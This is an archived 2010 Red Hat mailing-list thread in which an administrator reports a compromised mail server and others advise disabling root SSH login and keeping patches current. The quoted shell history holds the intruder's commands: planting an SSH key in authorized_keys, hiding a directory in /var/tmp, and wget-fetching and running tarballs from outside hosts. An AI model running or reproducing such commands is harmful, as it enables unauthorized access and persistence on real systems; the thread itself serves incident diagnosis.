Re: help

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Agreed. 

Also, Never allow root login via ssh.  
Always keep th os up to date with at least security patches.

This should not be news to this audience.


----- Original Message -----
From: redhat-list-bounces@xxxxxxxxxx <redhat-list-bounces@xxxxxxxxxx>
To: General Red Hat Linux discussion list <redhat-list@xxxxxxxxxx>
Sent: Thu Jan 28 08:11:44 2010
Subject: Re: help

Brute force attacks. Leaving root ssh open to the world us begging to  
be owned like this. Always turn that off or use key only auth for root  
on Internet facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy@xxxxxxxxx> wrote:

> still i m thinking how he/she got my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx
>>> wrote:
>>
>>> You may change your root password first, and then you can continue  
>>> to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list- 
>>> bounces@xxxxxxxxxx] On
>>> Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>>                   i m using RHEL5.3 as a my mail server with real  
>>> ip.i
>>> configure my system mostly remotely.last login time of my system  
>>> 27 jan
>>> from   this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got  
>>> authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first  
>>> 10 lines
>>> of last command...i thinks someone hack my system.i am sending  
>>> history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still  
>>> logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still  
>>> logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52   
>>> (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45           
>>> (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52   
>>> (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27   
>>> (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34   
>>> (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33   
>>> (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32   
>>> (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51   
>>> (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>> 115  cat /proc/cpuinfo
>>> 116  mkdir .ssh
>>> 117  cd .ssh
>>> 118  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119  cd /var/tmp
>>> 120  mkdir " "
>>> 121  cd " "
>>> 122  passwd
>>> 123  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124  ps -x
>>> 125  cd /var/tmp
>>> 126  w
>>> 127  wget http://kok.ucoz.de/gosh.tgz
>>> 128  tar xvf gosh.tgz
>>> 129  cd gosh
>>> 130  chmod +x *
>>> 131  ./go.sh 121
>>> 132  w
>>> 133  ps -x
>>> 134  ps -aux
>>> 135  cd /var/tmp
>>> 136  cd " "
>>> 137  ls -a
>>> 138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139  tar xzvf fld.tgz
>>> 140  cd fld
>>> 141  chmod +x *
>>> 142  nano cyc.acc
>>> 143  nano cyc.acc.1
>>> 144  nano cyc.set
>>> 145  ./httpd
>>> 146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
> -- 
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

[Index of Archives]     [CentOS]     [Kernel Development]     [PAM]     [Fedora Users]     [Red Hat Development]     [Big List of Linux Books]     [Linux Admin]     [Gimp]     [Asterisk PBX]     [Yosemite News]     [Red Hat Crash Utility]


  Powered by Linux